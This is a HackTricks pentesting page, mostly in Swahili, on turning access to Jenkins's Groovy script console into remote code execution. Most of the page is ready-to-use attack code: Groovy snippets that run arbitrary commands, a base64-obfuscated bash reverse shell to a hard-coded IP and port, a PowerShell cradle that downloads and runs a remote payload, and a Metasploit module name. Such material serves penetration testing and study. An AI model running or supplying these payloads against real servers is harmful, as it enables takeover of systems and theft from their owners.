HackTricks CloudJenkins RCE with Groovy Script
Tip
Jifunze na ufanye mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Saidia HackTricks
- Angalia the subscription plans!
- Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.
- Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.
Jenkins RCE with Groovy Script
Hii ni kimya zaidi kuliko kuunda mradi mpya katika Jenkins
- Nenda kwenye path_jenkins/script
- Ndani ya kisanduku cha maandiko ingiza scripti
def process = "PowerShell.exe <WHATEVER>".execute()
println "Found text ${process.text}"
Unaweza kutekeleza amri kwa kutumia: cmd.exe /c dir
Katika linux unaweza kufanya: "ls /".execute().text
Ikiwa unahitaji kutumia quotes na single quotes ndani ya maandiko. Unaweza kutumia “”“PAYLOAD”“” (triple double quotes) kutekeleza payload.
Script nyingine ya groovy yenye manufaa ni (badilisha [INSERT COMMAND]):
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = '[INSERT COMMAND]'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
Reverse shell katika linux
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
Reverse shell katika windows
Unaweza kuandaa seva ya HTTP yenye PS reverse shell na kutumia Jeking kupakua na kuitekeleza:
scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')"
echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0
cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc <BASE64>
Script
Unaweza kuendesha mchakato huu kwa kutumia hiki skripti.
Unaweza kutumia MSF kupata shell ya kurudi:
msf> use exploit/multi/http/jenkins_script_console
Tip
Jifunze na ufanye mazoezi ya AWS Hacking:
Jifunze na ufanye mazoezi ya GCP Hacking:
Jifunze na ufanye mazoezi ya Az Hacking:Saidia HackTricks
- Angalia the subscription plans!
- Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.
- Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.